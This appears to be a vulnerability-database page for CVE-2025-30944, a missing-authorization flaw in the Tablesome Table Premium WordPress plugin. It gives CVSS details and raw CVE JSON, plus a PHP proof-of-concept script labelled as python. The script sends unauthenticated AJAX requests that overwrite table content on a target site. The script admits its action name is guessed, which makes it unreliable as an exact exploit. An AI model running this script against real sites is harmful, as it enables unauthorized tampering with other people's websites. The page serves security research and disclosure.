Security Vulnerability Report
中文
CVE-2025-30944 CVSS 7.5 HIGH

CVE-2025-30944

Published: 2025-10-22 15:15:33
Last Modified: 2026-04-27 17:16:26

Description

Missing Authorization vulnerability in Essekia Tablesome Table Premium tablesome-premium allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Tablesome Table Premium: from n/a through <= 1.1.23.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Tablesome Table Premium (tablesome-premium) <= 1.1.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-30944 - Tablesome Table Premium Missing Authorization PoC * Description: Exploits broken access control in tablesome-premium <= 1.1.23 * via unauthenticated AJAX endpoint (admin-ajax.php) * Usage: php poc.php <target_url> * Note: This is a conceptual PoC demonstrating the attack vector. * The actual action name and parameters depend on the * specific unprotected AJAX action exposed by the plugin. */ if ($argc < 2) { die("Usage: php poc.php <target_wordpress_url>\n"); } $target = rtrim($argv[1], '/'); $ajax_url = $target . '/wp-admin/admin-ajax.php'; // The plugin registers AJAX actions without proper capability checks. // Replace 'tablesome_action' with the actual unprotected action name. $action = 'tablesome_save_table'; // Crafted payload to invoke the privileged functionality without authentication $payload = http_build_query([ 'action' => $action, 'table_id' => '1', 'table_data' => json_encode([ 'title' => 'Pwned by CVE-2025-30944', 'content' => 'Malicious content injected via broken access control', ]), ]); $ch = curl_init($ajax_url); curl_setopt_array($ch, [ CURLOPT_POST => true, CURLOPT_POSTFIELDS => $payload, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'], CURLOPT_TIMEOUT => 15, ]); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "[+] Target: $target\n"; echo "[+] Endpoint: $ajax_url\n"; echo "[+] Action: $action\n"; echo "[+] HTTP Status: $http_code\n"; echo "[+] Response: $response\n"; if ($http_code === 200 && stripos($response, 'success') !== false) { echo "[!] Exploit may have succeeded - check the target site.\n"; } else { echo "[-] Exploit may have failed or the action name differs.\n"; } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30944", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:33.033", "lastModified": "2026-04-27T17:16:26.003", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Essekia Tablesome Table Premium tablesome-premium allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Tablesome Table Premium: from n/a through <= 1.1.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tablesome-premium/vulnerability/wordpress-tablesome-table-premium-1-1-23-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}